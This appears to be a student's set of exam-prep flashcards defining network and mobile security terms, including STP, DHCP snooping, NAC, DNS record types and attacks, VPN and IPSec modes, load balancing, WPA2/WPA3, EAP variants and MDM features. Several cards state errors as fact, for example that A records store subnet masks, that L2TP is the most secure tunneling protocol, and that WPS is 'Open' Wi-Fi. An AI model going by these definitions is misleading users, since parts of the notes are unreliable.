Bridge Protocol Data Unit (BPDU) guard These are frames that contain information about the STP (Spanning Tree Protocol). (STP is a Layer 2 network protocol used to prevent looping within a network topology. STP was created to avoid the problems that arise when computers exchange data on a local area network (LAN) that contains redundant paths.) A BPDU Guard enables the STP (Spanning Tree Protocol) to stop such attempts.
Loop Prevention When 2 or more switches are joined together, they can create loops that create broadcast storms. (They'll send Traffic Back & Forth forever, which brings down the network. ) Spanning Tree Protocol (STP) prevents this from happening by forwarding, listening, or blocking on some ports.
(STP) Spanning Tree Protocol (STP) is a Layer 2 network protocol used to prevent looping within a network topology. STP was created to avoid the problems that arise when computers exchange data on a local area network (LAN) that contains redundant paths. - Very common way to implement Loop Control on any network - Can also detect Problems on the Network - Basic Configuration includes 3 parts: A) Root Port B) Designated Port C) Blocked Port
(DHCP snooping) (Dynamic Host Configuration Protocol snooping) a Layer 2 (the switch) Security that prevents a rogue DHCP server from allocating IP addresses to a host on your network. - The Switch is a DHCP FireWall - Trusted: Routers, Switches, Particular DHCP servers (you configure the Trusted Devices) - Untrusted (you can configure what devices or servers are Untrusted) - Switch watches for DHCP converstations
Media Access Control (MAC) filtering Media Access Control (the Hardware's Address) - Limits the access through the Physical Hardware Address - Allows you to create & configure a list of authorized wireless client interface MAC addresses - used by a wireless access point to block access to all non-authorized devices. - also factors in some Ethernet (wired) network scenarios. - MAC Filtering allows the administrator to allow / disallow Traffic based on the MAC address
Out-of-band management (OOB management) In systems management, out-of-band management (OOB; also lights-out management or LOM) is a process for accessing and managing devices and infrastructure at remote locations through a separate management plane from the production network. OOB allows a system administrator to monitor and manage servers and other network-attached equipment by remote control regardless of whether the machine is powered on or whether an OS is installed or functional.
"Network Access Control (NAC) : ""Agent vs Agentless"" -- Define Agent" Agent What is Agent? Agent is a software that is being installed on the clients computer that usually performs tasks such as authenticating user, checking for updated and ensuring the device compliance with organization's security standards. Some operating systems include Network Access Control (NAC) as part of the Operating System itself. And no additional agent is required. These generally perform checks when the system logs into the network and logs out of the network, making them less configurable. If you need additional functionality, you may require 2 more types of Agents: 1. Persistent: A permanent agent is installed on the host. 2. Dissolvable: A dissolvable agent is known as temporary and is installed for a single use
"Network Access Control (NAC) -- define ""Agentless""" NAC controller is embedded into the Active Directory and so it does not need and Agent to be installed
Network Access Control (NAC) "also known as network admission control, is the process of restricting unauthorized users and devices from gaining access to a corporate or private network. NAC ensures that only users who are authenticated and devices that are authorized and compliant with security policies can enter the network ------------------------------- After a remote client has authenticated, Network Access Control (NAC) checks that the device being used is patched and compliant with corporate security policies. A compliant device is allowed access to the LAN. A non-compliant device may be redirected to a boundary network where a remediation service address issues - Boundary network is sometimes called a “quarantine network"""
DNS Poisoning (review) when an attacker alters the domain-name-to-IP-address mappings in a DNS system to redirect traffic to a rogue system or perform DoS against a system
DNS Spoofing occurs when an attacker sends false replies to a requesting system, beating the real reply from the valid DNS server
DNS Hijacking aka “DNS Redirection” attack many ways to perform DNS Hijacking, the most common way we see is used by a captive portal such as a pay-for-use WiFi hotspot.
Homograph Attack "aka Script Spoofing a method of deception wherein a Threat Actor / Malicious attacker leverages the similarities of character scripts to create and register phony/ fake International Domain Names (IDNs) of Existing ones to fool users and lure them into visiting those websites. e.g. Latin character ""a""is replaced with the Cyrillic character ""а“in example.com or substitute ""l"" with the number ""1""."
End Goal of most DNS attacks
What is DNSsec being used for? Prevents unauthorized access to DNS recordson the server. Each DNS record is digitally signed, creating an RRSIG record (A Digitally Signed Record) to protect against attacks
DNS cache stores recently resolved DNS requests for later reuse, reducing calls to the DNS server
DNS cache (review) stores recently resolved DNS requests for later reuse, reducing calls to the DNS server
Hosts File This is a flat-file where name and IP pairs are stored on a client. (Often checked before request is sent to DNS server)
DNS Server This normally maintains only the hostnames for domains it is configured to serve. - Server is said to be “authoritative” for those domains
DNS Root Server DNS nameservers that operate in the root zone. they can also refer requests to the appropriate Top-Level Domain (TLD) server.
DOMAIN NAME SYSTEM (DNS) DOMAIN NAME SYSTEM (DNS) a hierarchical naming system that resolves a hostname to an IP address. PORT: 53
Fully-Qualified Domain Name (FQDN) A hostname + Domain. for example: server1.contoso.com
DNS Record Types (there are MANY, but here are some common ones) here is an overview of resource records (RRs) permissible in zone files of the Domain Name System (DNS). Records: SOA (Start of Authority record) A (Address record for IPV4) AAAA (IPV6 Address Record) SRV (Service Locator -- Generalized Service Location record used in MX) CNAME (Canonical Name record) NS (Name Server) PTR (Pointer Record) MX (Mail Exchange record) RRSIG (DNSSEC signature) DName (Delegation Name Record)
SOA record Start of Authority (SOA) record: Specifies authoritative information about a DNS zone, including the primary name server, the email of the domain administrator, the domain serial number, and several timers relating to refreshing the zone.. - considered an important DNS record type that stores admin information about a domain. This information includes the email address of the admin and when the domain was last updated.
"DNS ""A"" record" "one of the most important DNS record types. The ""A"" in A record stands for ""Address"". An A record shows the IP address for a specific hostname or domain. It uses the IPV4 address The A record is the Address record for IPV4. it Returns a 32-bit IPv4 address, most commonly used to map hostnames to an IP address of the host. Also stores Subnet Masks The main use of A record is for IP address lookup. - Another use of A record is in the domain name system-based blackhole list (DNSBL). Here, the A record is used to block mail from known spam sources."
DNS AAAA record AAAA is the IPV6 Address Record. returns a 128-bit IPv6 address. It maps a domain or subdomain on IPv6 DNS A record is IPv4 - points to the IP address for a domain. However, this DNS record type is different in the sense that it points to IPV6 addresses.
SRV record Service Locator (SRV) Record -- A Generalized Service Location Record, used for newer protocols INSTEAD of creating protocol-specific records, for example MX. - Using this DNS record type, it's possible to store the IP address and port for specific services.
CNAME record "CNAME is a (Canonical Name record) aka as the Alias record it is an ""Alias"" of one name to another: the DNS lookup will continue by retrying the lookup with the new name. - remember: it is a DNS record that points a domain name (an alias) to another domain. In a CNAME record, the alias doesn't point to an IP address. And the domain name that the alias points to is the canonical name. Example: the subdomain ng.example.com can point to example.com using CNAME. Here example.com points to the actual IP address using an A record. -A practical example for the use of CNAME records is running multiple subdomains for different purposes on the same server."
NS record In other words, the NS record helps point to where internet applications like a web browser can find the IP address for a domain name. Usually, multiple nameservers are specified for a domain. Example, these could look like ns1.examplehostingprovider.com and ns2.examplehostingprovider.com.
MX record Mail Server Record In other words, an MX record makes it possible to direct emails to a mail server.
PTR record Pointer record (PTR) maps an IP-Address to Host-name (Domain Name) Resolution. The PTR record resolves an IP address to a domain/hostname. PTR's are primarily used for DNS Reverse Address lookup
DNAME record DELEGATION NAME RECORD (DNAME). Alias for a name and all its subnames, unlike CNAME, which is an alias for only the exact name.
RRSIG record type aka DNSSEC signature. Signature for a DNSSEC-secured record set.
(SPF) - Sender Policy Framework Sender Policy Framework (SPF) : This is a text (TXT) record used by DNS to prevent spam and confirm legitimacy of the domain from which the email originated from
(DMARC) - Domain-based Massage Authentication, Reporting and Conformance Domain-based Message Authentication, Reporting and Conformance (DMARC): This is DNS text (TXT) that is used by Internet Service Providers (ISPs) to prevent malicious email, such as phishing or spear phishing attacks.
(VPN) Virtual Private Netwok (VPN) mechanism for creating a secure connection between a computing device and a computer network, or between two networks, using an insecure communication medium such as the public Internet.[1] extends a private network across a public network, enabling users and devices to send and receive data across shared or public networks as if their computing devices were directly connected to the private network.
"VPN -- ""Always on""" "some VPN software can be configured to be ""Always On""."
SSL / TLS VPN VPN's uses common SSL/ TLS protocol (uses TCP Port 443) - (almost ) has no Firewall issues. - does not need a Big VPN clients , not incredibly complex - usually uses remote access communications - Authenticates users (no requirement for Digital Certificates or shared passwords, unlike IPSEC) - VPNs can be run from a Web Browser or from a (light) VPN client - Also runs across Many Operating Systems
HTML5 VPNs Hypertext Markup Language version 5) - HTML5 includes comprehensive API support and a Web Cryptography API as part of the web browser. We simply start a browser that supports HTML5 and we are able to send SSL VPN communication
Full Tunnel VPN End user VPN configuration can be configured as a Full Tunnel or a Split Tunnel - in a Full Tunnel - Everything that is being transmitted by the End user goes to a VPN concentrator which decides what it will do with the Data - In a Full Tunnel: All of the Data goes across the Encrypted Tunnel and the END user can NOT break out of that Tunnel to send information to another device directly.
Split Tunnel "The Administrator of the VPN can configure some of the Information to go through the ""Tunnel"" and other information can go OUTSIDE of the tunnel. Ex: An End user can communicate to the Remote Network via the VPN concentrator, but if they need to communicate with another website server, they can communicate through the SPLIT Tunnel DIRECTLY to that server. It doesn't need to go through the Full Tunnel."
Site-to-Site VPN In site-to-site VPN, IPSec site-to-site VPN uses an always on mode where both packet header and payload are encrypted. - uses IPSec tunnel mode
Remote Access VPN In a remote access scenario, a connection is initiated from a users PC or laptop for a connection of shorter duration - uses IPSec Transport Mode.
Split Tunnel vs Full Tunnel Full tunnel means using VPN for all traffic, both to the Internet and corporate network. Split tunnel uses VPN for traffic destined for the corporate network only, and Internet traffic direct through its normal route.
Remote Access vs Site-to-Site VPN In site-to-site, IPSec site-to-site VPN uses an always on mode where both packet header and payload are encrypted. (IPSec tunnel mode) In a remote access scenario, a connection is initiated from a users PC or laptop for a connection of shorter duration. -- uses IPSec transport mod
(L2TP) Layer 2 Tunneling Protocol (L2TP) - connects 2 networks / sites together OVER a LAYER 3 Network acts as if they're on the same Layer 2 network. However, they are connected OVER a LAYER 3 Network - L2TP/IPSec - THE MOST SECURE TUNNELING PROTOCOL that can use Kerberos authentication, certificates and pre-shared keys
OSI Model Layers 7. The Application Layer (Layer 7) 6. The Presentation Layer (Layer 6) 5. The Session Layer (Layer 5) 4. Transport Layer (Layer 4) 3. Network Layer (Layer 3) 2. Data Link (Layer 2) 1. Physical (Layer 1)
IPSec Internet Protocol Security (IPSec) is a secure network protocol suite that authenticates and encrypts packets of data to provide secure communication between two computers.It is used in VPN - Security for OSI Layer 3 (Network Layer) Uses 2 major protocols: 1. Authentication Header (AH) Protocol - authenticates the origin of IP packets (datagrams) and guarantees the integrity of the data. 2. Encapsulation Security Payload (ESP) Protocol - Provides ENCRYPTION and authenticate the packets of data between computers using a Virtual Private Network (VPN).
IPSec Modes IPSec has 2 Modes: 1. Tunnel Mode - (Most Commonly used mode for IPSec) 2. Transport Mode In Tunnel Mode: the IP Header, Data, and ESP Trailer are ENCRYPTED. The rest are Authenticated In Transport Mode: the DATA & ESP Trailer are the only Encrypted items.
(VLAN) Virtual Local Area Network (VLAN) A VLAN is any broadcast domain that is Partitioned and Isolated in a computer network at the Data Link Layer (Layer 2). - usually Done in Switches and a logical segmentations of a LAN.
Where is Screened Subnet located? "previously known as Demilitarized Zone (DMZ) & ""Triple-Homed Setup"" . it is a subnet that is placed between two routers or firewalls. Bastion host(s) are located within that subnet."
What is East-West traffic? where Network Traffic moves Laterally, between Servers WITHIN a Data Center.
North-South Traffic traffic that moves outside of the data center
Network Segmentation Approach that divides a network into multiple segments or subnets, each acting as its own small network. This allows network administrators to control the flow of traffic between subnets based on granular policies.
Reasons for Network Segmentation: Providing Security can also improve security by isolating traffic and user access to those segments where they are authorized. Boosting Performance can improve performance through an organizational scheme in which systems that often communicate are located in the same segment, while systems that rarely or never communicate are located in other segments. Reducing Communication Problems reduces congestion and contains communication problems, such as broadcast storms, to individual subsections of the network.
Extranet An extranet is a private network that enterprises use to provide trusted third parties -- such as suppliers, vendors, partners, customers and other businesses -- secure, controlled access to business information or operations. Extranets, which take the form of external-facing websites or platforms, can sometimes be viewed as part of or an extension of the organization's intranet. This is because the information hosted on an extranet is typically only accessible on internal networks. Although information on an extranet is accessible to users outside the company, access is tightly controlled and only awarded to authorized users.
Intranet a private network that is designed to host the information internal to the organization
Zero Trust - No entity is trusted by default - addresses the limitations of the legacy network perimeter-based security model. - Treats User Identity as the control. - Assumes that there is compromise / breach in verifying EVERY request. - EVERYTHING must be Verified - Nothing is trusted - Multifactor Authentication, Encryption, System permissions is included. A system where there is NO trust and everything has to be verified.
Load Balancing a software or hardware device that distributes Network traffic Across multiple servers. This ensures no single server bears too much demand/
Load Balancing Algorithms (Scheduling Load Balancing) 1. Round Robin: Rotates servers by directing traffic to the 1st available server and then moves that server to the bottom of the queue. Most useful when servers are of equal specification and there are not many persistent connections. 2. Smart Loading: Load balancer and Servers are Constantly communicating amonst themselves to tell the LB which Server can take the next workload 3. Least Connection Method — directs traffic to the server with the fewest active connections. Most useful when there are a large number of persistent connections in the traffic unevenly distributed between the servers 4. Least Response Time Method — directs traffic to the server with the fewest active connections and the lowest average response time. 5. Dynamic Round Robin: Sends the next request to the server with the Lightest/least load. 6. Weighted Round Robin: Prioritiezes 1 Server over Another. More traffic goes to the server with the higher specs
Active - Active Load Balancing Act like an array as the deal with the traffic together at full capacity. If one of them fail it will significantly degrade the performance
Active-Passive Load Balancing Active node is taking care of traffic. Passive node is monitoring and listening If active node fails then the passive takes over so it provides redundancy
Round Robin Rotates servers by directing traffic to the 1st available server and then moves that server to the bottom of the queue. Most useful when servers are of equal specification and there are not many persistent connections. Ex: you have 1 Load Balancer and 2 Servers: the first client to connect is sent to the first server, the second client goes to the second server, the third client goes back to the 1st server, the fourth client back to the 2nd server, and so on.
Least Connection Method directs traffic to the server with the fewest active connections. Most useful when there are a large number of persistent connections in the traffic unevenly distributed between the servers
Dynamic Round Robin: The LB is keeping track of the distributed loads across the servers. Sends the next request to the server with the Lightest/least load.
Weighted Round Robin: Prioritizes 1 Server over Another. Perhaps 1 server received Half of the Load, and the other servers take on the rest.
Virtual IP Load balancing Load Balancer that holds virtual IP (VIP) and is presented to the client as an application. Client connects to the VIP and the NLB determines the specific application instance to which the traffic should be sent to. It eliminates host's dependancy on one individual network interface -You can use virtual IP to achieve load balancing across multiple interfaces
Persistence/Affinity/Sticky Session (Load Balancing) When the NLB is set to Affinity the request that comes is being sent to the previously connected server based on the user's IP and/or session ID
Load Balancing Cluster The Hardware Load Balancer that distribuites the traffic across multiple servers to improve performance - Load Balancing Clusters prioritize balancing the jobs among all of the servers in the cluster and incorporate load balancing software in the controlling node.
WiFi Protected Access 2 (WPA2) WPA2 is also An encryption scheme that implemented the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP). - Based on AES Encryption. - CCMP is based on the AES encryption scheme - Allows Pre-Shared Keys. (PSK)
WiFi Protected Access 3 (WPA3) still uses AES encryption with it's Data, but unlike WPA2, it replaced the CCMP with SAE (Simulataneous Authentication of Equals). The reason it replaced CCMP was because the PSK (Pre Shared Keys) became a security issue.
(SAE) Simultaneous Authentication of Equals (SAE) used with WPA3-Personal and replaces the WPA2-PSK (this protects against Brute Force Attacks) - uses a secure Diffie Hellman handshake, called Dragonfly - uses perfect forward secrecy, so immune to offline attacks
(CCMP) Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) created to replace WEP and TKIP/ WPA - uses AES (Advanced Encryption Standard) with a 128-bit key used with WPA2, which replaced WEP and WPA Uses Counter mode to produce keystream and use the keystream to encrypt the plain text in CBC
(EAP) authentication framework that allows for new authentication technologies to be compatible with existing wireless or point-to-point connection technologies
EAP - FAST wireless authentication protocol created by Cisco, used in wireless point-to-point connections to perform session authentication Replaced LEAP as it was not secure ,- NO Digital Certificates are used to Authenticate!! ========= How it works: - The Authentication Server (AS) and Client are able to transfer information between each other via a shared tunnel (via TLS) . This is done via a shared Protected Access Credential (PAC) aka a Shared Secret. - The Client receives the PAC. - The Client and AS mutually Authenticate and negotiate a Transport Layer Security (TLS) tunnel - User Authentication occurs over the TLS tunnel - Requires a RADIUS Server to provide Authentication Database and EAP-Fast services
PEAP aka Protected Extensible Authentication Protocol encapsulates EAP methods within a TLS tunnel providing authentication and potentially encryption Protected-EAP -Does Not use a PAC (Shared Secret Key) like EAP- FAST. - Created by Cisco, Microsoft and RSA security
EAP TLS EAP Transport Layer Security a secure version of wireless authentication that requires x509 certification. Involves 3 parties: The Supplicant(user)->The authenticator(switch or controller)->Authentication Server(RADIUS)
EAP-TTLS - EAP Tunneled Transport Layer Security. Type of EAP that uses 2 phases: 1 - set up a secure session with the server, by creating a tunnel, utilizing certificates that are seamless to the client 2 - uses protocol such as MS-CHAP to complete the session Designed to connect to legacy systems
IEEE 802.1x aka 802.1x Network Access Control (NAC) is An IEEE standard for port-based network access control (PNAC) on wired and wireless access points. 802.1X defines authentication controls for any user or device trying to access a LAN or WLAN. - You don't get to Access the Network until you Authenticate. - used in Conjunction with an Access Database (ex; RADIUS, LDAP, TACACS+) Other Definition: is transparent to users because it uses certificate authentication and can be used in conjunction with a RADIUS server for enterprise networks.
(RADIUS) Federation Remote Authentication Dial-in User Service (RADIUS) - Protocol and Software that enables Federation Members of 1 Organization to Authenticate to the network of Another Organization (within the Federation) using their Normal Credentials. This allows you to link a users identity within multiple Authentication Systems - Federation -- Established Trust Across multiple RADIUS servers & Across Multiple Companies/ Organizations. - use 802.1X as the Authentication method with RADIUS on the backend and uses EAP to Authenticate.
Pre-shared key (PSK) vs Enterprise vs Open PSK (WPA2-PSK) was introduced for the home user who does not have an enterprise setup.the home user enters the password of the wireless router to gain access to the home network. -PSK in WPA2 Replacedby SAE in WPA3. Enterprise: a corporate version of WPA2 or WPA3, used in a centralized domain environment.Often where a RADIUS server combines with 802.1x, using certificates for authentication Open (WPS - Wifi Protected Setup -- meaning no password required) password is already stored and all you need to do is to press the button to get connected to the wireless network. - seen in Homeuse scenarios - Password is stored locally, so could be brute-force
PSK (WPA2-PSK) was introduced for the home user who does not have an enterprise setup.the home user enters the password of the wireless router to gain access to the home network. -PSK in WPA2 Replacedby SAE in WPA3.
Enterprise: a corporate version of WPA2 or WPA3, used in a centralized domain environment.Often where a RADIUS server combines with 802.1x, using certificates for authentication
Open (WPS - Wifi Protected Setup -- meaning no password required) password is already stored and all you need to do is to press the button to get connected to the wireless network. - seen in Home use scenarios - Password is stored locally, so could be Brute-Force Attacked - Suggested : DO NOT USE THIS -- this is a Security RISK
Captive Portals Usually being used at airports. In order to connect to the Wi fi we are being redirected to the official page to provide additional identification factor like social ID.
Site Surveys (Installation Considerations) The process of Investigating & Identifying the presence, strength, and reach of Wireless access points deployed in an environment. - usually involves walking around with a portable wireless device, taking note of the wireless signal strength, and mapping this on a plot or schematic of the building.
Heat maps a wifi heat map lets you VIEW the coverage of your network and Wi-Fi Access Points This can help you understand which specific areas lack coverage and which have Strong and Dependable signal strength available to them. Several Factors can interfere with Signal. This could be due to the presence of Physical Objects: like walls, or non physical objects like wireless devices emitting frequencies on the same wavelength Example: www.dnsstuff.com/wi-fi-heat-maps
WiFi analyzers a useful software application / tool that can tell you many things about your Wireless Network and the Networks around you, helping you optimize your Wifi for Best Performance.
Channel overlaps when devices from overlapping channels are trying to talk over each other. This causes a type of interference called Adjacent-Channel interference. other definition: -when signals from two or more Devices (wireless router or radio) that are transmitting at the same frequency, can be received with comparable intensity. Interference occurs frequently in such a zone. The best solution is to change the Channel(s) of the Router or device to one that won't overlap.
Where should a Wireless access point (WAP) be placed? New WAPs should be placed in spots with minimal channel overlap and maximum coverage of area. Any electronic device, concrete walls and other metal bodies will absorb the signal
Controller and Access Point security In a large office there will be a lot of WAPs with their own separate configurations. They will need to be managed by centralized management of configurations. HTTPS should be used to encrypt the traffic
Cellular "Cellular Networks are used for Mobile Devices (Cell Phones). Cellular Network Towers separate the Networks into Individual cells. Each Antenna contains a different set of Frequencies for each Cell of the Network. Security Concerns: - on some Cell Networks you may be able to Monitor Traffic between the Cell phone and the Tower (Network) - Location Tracking features based on the signal your cell phone sends to the Tower. (unsafe) - Wordwide Access to a Mobile Device -- you can connect on any one of these Networks via LTE, however this can present a problem to Security Teams who want you to ""Authenticate"" into their network."
Wi-Fi - Local Network Access present Local Security Problems - Same Security Concerns exist for other Wifi Devices and Networks - Next concern is Encrypting your DATA so it can't be captured and read. - On-Path Attack is a concern where someone sits in the Middle of the conversation and watches the communication go back and forth - also DoS attacks are always a concern
Definition of Bluetooth Bluetooth, or IEEE 802.15, Personal area networks (PANs) provide High speed communication over Short Distances. These are another area of wireless security concern. Connects headsets for cell phones, mice, keyboards, GPS, and other devices. Connections are set up using Pairing, where primary device scans the 2.4 GHz radio frequencies for available devices
RFID Radio Frequency Identification : uses radio frequency to identify electromagnetic fields in a tag to track assets.commonly used in shops as the tags are attached to high-value assets to prevent theft. RFID uses Radar Technology -- Radio energy is transmitted to the Tag. FR powers the tag, ID is transmitted back. Provides Bidirectional communication.
NFC Near Field Communication - a 2 way wireless communications that builds on RFID.Subject to many of the same vulnerabilities as RFID Seen in : - Payment Systems (Google Wallet, Apple Pay) - Bootstaps Bluteooth pairing - can be used as an Access Token or Identity Card. Security Concerns: - Remote Capturing (since it's a wireless network, 10 meters for Active devices.) - Potential Frequency Jamming can be caused and created by a DoS - susceptible to Man in the Middle Attacks - If you lose you phone or it's stolen, you lose the RFC functionality / device
Infrared Device is purely line-of-sight and has a maximum range of about 1 meter. Can be used to print from your laptop to an infrared printer. - Included on many Smartphones, Tablets, & Smartwatches - Allows you to control you entertainment center using IR - File Transfers are possible - Infrared does not contain Security! so it's possible that other phones can be used to control your IR devices
USB (Universal Serial Bus) aka Universal Serial Bus USB allows a physical connection from your device to your computer. The device can even be a mobile device. Some mobile devices can be tethered to a USB dongle to gain access to the internet. A flash drive / USB device can be used to transfer data between devices It is a Data Exfiltration concern, often blocked through policy - a Mobile phone can be used as a Mobile Storage device, as you wouldn't want private information from a computer copied to an employees cell phone.
(P2P) Point-to-point connection (P2P) a permanent, dedicated One-to-One connection between 2 devices communicating on a network, typically via Phone, Wireless, Fiber, etc. Traditionally, these connections DONT traverse over the Public Internet, but there are Exceptions such as with Cloud Voip Ex: Connections between 2 buildings -- Point to Point Network links them together. Point-to-point is sometimes abbreviated as P2P. This usage of P2P is distinct from P2P meaning peer-to-peer in the context of file sharing networks or other data-sharing protocols between peers.
(P2MP, PTMP or PMP) Point-to-multipoint communication (P2MP, PTMP or PMP) A type of communication that is a way for 1 Device (point) to send information to multiple other devices (Multipoint), ALL AT ONCE over a Shared Channel. multiple paths from a single location to multiple locations. one of the most popular communication methods today (802.11 wireless) Point-to-multipoint telecommunications is typically used in wireless Internet and IP telephony via gigahertz radio frequencies -- Does not imply full connectivity between nodes. - Ex: A WAP connecting to multiple wireless devices
Global Positioning System (GPS) uses satellites in the Earth's orbit to measure the distance between 2 points. - created by the U.S Department of Defense. - Precise Navigation : Needs to see at least 4 Satellites. - Determines Location based on Timing Differences from each of these Satellites: by using each of these timing differences, it can determine your Longitude, Latitude, & Altitude. - Commonly used for Maps & Directions.
Mobile Device Management (MDM ) review "any software that allows IT to ADMINISTER, automate, control, and secure administrative policies on smartphones, laptops, tablets, or any other device connected to an organization's network. MDM is usually implemented with the use of a third-party product that has management features for particular vendors of mobile devices MDM manages company owned data and end users devices - Allows us a Centralized Management of the Mobile devices (Specialized Functionality) - Set Policies on Apps, Data, Camera, etc - Control the Remote Device - The Entire Device or ""partition"" - BYOD 0 Bring your own device - You can also specify the type of Security / Manage Access Control"
Application management uses whitelists to control which applications are allowed to be installed onto the mobile device. - Since not All Applications are secure (some are malicious) a Whitelist is a good idea - Managed through the MDM of approved whitelisted applications
Content management stores business data in a secure area of the device in an encrypted format to protect it against attacks. Prevents confidential or business data from being shared with external users. - Manage Content Management (MCM) allows us to secure access to the Data and protect it from Outsiders - This allows us to set policies depending on where the content is stored. - File sharing and Viewing (on site content - Microsoft Sharepoint, file servers) - Cloud Based Storage (Box, Office 365) - Data sent from the Mobile Device -(Data Loss Prevention prevents copy / paste of sensitive data) -Ensures Data is Encrypted on the Mobile Device.
Remote wipe When a mobile device has been lost or stolen, it can be remotely wiped. Device will revert to its factory settings and the data will no longer be available - wipe options allow removing business data only (BYOD) - Managed from the MDM -- allows you to click a button and WIPE all of the data on that device regardless of where it's at.
Geolocation uses GPS to give the actual location of a mobile device. can be very useful if you lose or drop a device. - Precise Tracking details (Tracks within Feet) - Can be used for Good or Bad (such as finding your phone or Finding You) For the exam: remember that geo-tracking will tell you the location of a stolen device
Geofencing uses the Global Positioning System (GPS) or RFID to define geographical boundaries. Once the device is taken past the defined boundaries, the security team will be alerted. For the exam remember: Geofencing prevents mobile devices from being removed from the company's premises. Extra: a Virtual Perimeter created by GPS or RFID -- this service triggers an action when a device enters a Set Location. Coupons, notifications, engagement features, security alerts — businesses are finding creative ways to make use of these Virtual Boundaries known as Geofencing.
Screen locks Screen locks are activated once the mobile device has not been accessed for a period of time. After it is locked, the user gets a fixed number of attempts to correctly enter the PIN before the device is disabled. - Allows mobile devices to be locked.
Push notifications messages that appear on your screen, even when your system is locked. This information is usually pushed your device without intervention from the end user and may include sensitive information. some MDM platforms provide policy-based control whether app notifications can appear with the notifications on lock screen.
Passwords and PINs Some mobile devices, such as smartphones, are very easy to steal and you can conceal them by putting them in a pocket. Strong passwords and PINs with six or more characters must be used.Also allows device to be disabled on X failed attempts
Biometrics can be made Mandatory via MDM for access via mobile device.
Context-aware Authentication the use of situational information (such as identity, geolocation, time of day or type of endpoint device) to improve information security decisions It requires knowledge of who the user is, what the user is requesting, how the user is connected, when the user is requesting information and where the user is located. Ex: What time of Day it is? The goal is to prevent unauthorized end users or insecure computing devices from being able to access corporate data. ----- Such an approach might allow an end user to browse the network from inside the office, for example, but deny access if the end user is trying to connect with public Wi-Fi.
Containerization of data on devices(MDM) the process of segregating / segmenting personal and corporate data on personal devices by creating a logical container to enhance corporate data security - segmenting the memory within the Device itself
Storage Segmentation segments the storage memory within the mobile device itself. It disallows Data in 1 Storage segment to get or retrieve Data from another storage segment.
Full device encryption (for MDM) the process of encoding all user data on a mobile device using an encrypted key. Once a device is encrypted, all user-created data is automatically encrypted before committing it to disk and all reads automatically decrypt data before returning it to the calling process. - Allows your device to be fully encrypted - seen in Apple iOS phones & Androids
MicroSD HSM (aka MicroSD Hardware Security Module) HSM definition is: hardware security module; it is a physical computing device that safeguards and manages digital keys, performs encryption and decryption functions for digital signatures, strong authentication and other cryptographic functions. ------- ------ A MicroSD HSM is: a physical device that provides Cryptographic features for your computer in a smaller, mobile form factor. enables associating a smaller piece of hardware with the cryptographic functions for encryption, key generation, digital signatures or authentication - Stores and Processes Encryption: Stores Cryptographic Keys and Can do Network Authentication & End-to-End Secure Encryption.
MDM / Unified Endpoint Management (UEM) UEM combines MDM and Endpoint Protection Software into 1 Unified software /console. Generally provides management of the hardware, such as desktops, tablets, smartphones, and IoT devices ensuring that they secure and compliant. It can manage the security and applications running on the devices can identify and block devices have been jailbroken (iOS) or Rooted (Android). - Multi-platform support is a key characteristic Ex: Microsoft Intune
(MAM) Mobile Application Management (MAM) is software that secures and enables IT control over enterprise applications on end users' corporate and personal devices. - manages Applications (not the Device) Ex: Microsoft Intune
SEAndroid "Security Enhancements for Android (SE for Android) prevents apps or processes from accessing data and resources that they are not allowed to. SEAndroid was built on SeLinux. SE for Android provides a Mandatory Access Control (MAC) over traditional Discretionary Access Control (DAC) environments. SE for Android can grant special privileges based specific EMM policies. In DAC environments, since SE for Android controls access of kernel resources, certain apps may not run as intended. Key Notes to know: - built on SELinux -implements MAC (Mandatory Access Control) into the Android OS that prevents people from doing ""Privledged Escalation""."
Third-party application stores (Enforcement & Monitoring of) There is a danger of downloading apps from 3rd party app stores as there is no guarantee of the security of the app being installed. This could pose a security risk, as vetting process for mobile apps in third-party stores may be less rigorous than official app stores.
Rooting/jailbreaking Gives you Root Access (Full Control) over the phone. Custom firmware downloads are used to Root an Android mobile device. This gives the user a higher level of permissions on that device and removes some elements of vendor security. - Jailbreaking is the Apple's iOS equivalent of Rooting on Android: it allows you to run unauthorized software and remove device security restrictions.You can still access the Apple App Store even though jailbreaking has been carried out. -For the exam: Rooting and jailbreaking remove the vendor restrictions on a mobile device to allow unsupported software to be installed.
Sideloading "Enables Installing an Application package in .apk format on a mobile device. Also allows installs from ""unknown"" sources. Useful for developers to run trial of third-party apps, but also Allows UNAUTHORIZED software to be run on a mobile device."
Custom firmware Custom firmware downloads are used so that you can root your mobile device! Gives the end user a higher level of permissions on that device and removes some elements of vendor security. - unknowingly, the Install of the firmware could have malware or rootkit on install, so you must be very careful
Carrier Unlocking When a mobile device is no longer tied to the original carrier. This will allow you to use your device with any provider, and also install third-party apps. - May not be an issue --Suggested you monitor these
Firmware over-the-air (OTA) updates Firmware is software that is installed on a small, read-only memory chip on a hardware device and is used to control the hardware running on device. Firmware OTA updates are pushed out periodically by the vendor, ensuring that the mobile device is secure. One example is when the mobile device vendor sends a notification that there is a software update. - Most likely fine -- recommended you Monitor.
Camera use Smartphone cameras pose a security risk to companies, as trade secrets could be stolen very easily. Research and development departments ban the use of personal smartphones in the workplace. -On Test: MDM policies can disable cameras on company-owned smartphones. Can also disable Screen Capture. - Prevents Theft of Intellectual Property
SMS/Multimedia Messaging Service (MMS) /Rich Communication Services (RCS) SMS: Text messaging and has become a common method of communication. Can be sent between two people in a room without other people in the room knowing about their communication. Text messages can be used to launch an attack. MMS: A way to send pictures as attachments, similar tosending SMS messages. RCS: An enhancement to SMS and is used in Facebook and WhatsApp to send messages so that you can see the read receipts. You can also send pictures and videos. -Image capability makes MMS and RCS paths for data theft.
External media SD card or other External storage media may enable unauthorized transfer of corporate data
USB On-The-Go (USB OTG) allows USB devices plugged into smartphones and tablets to act as a host for other USB devices. Attaching USB devices can pose security problems as it makes it easy to steal information. - Allows you to mount your mobile phone as a USB stick -- which then gives the computer access to the phones data. Apple does NOT allow USB On The Go
Recording microphone smartphones and tablets can record conversations with their built-in microphones. They could be used to take notes, but they could also be used to tape conversations or record the proceedings of a confidential meeting
GPS tagging When you take a photograph, GPS tagging adds the location where the photograph was taken. Most modern smartphones do this by default - you may want to turn this feature off for work
WiFi Direct /Ad hoc Wi-Fi direct wireless network allows two Wi-Fi devices to connect to each other without requiring a WAP. It is single-path and therefore cannot be used for internet sharing. Ad-hoc wireless network is where two wireless devices that can connect without a WAP, but it is multipath and can share an internet connection with someone else. - this allows users to setup their own wireless connections. - End users should NOT be Allowed to use Ad-Hoc!!
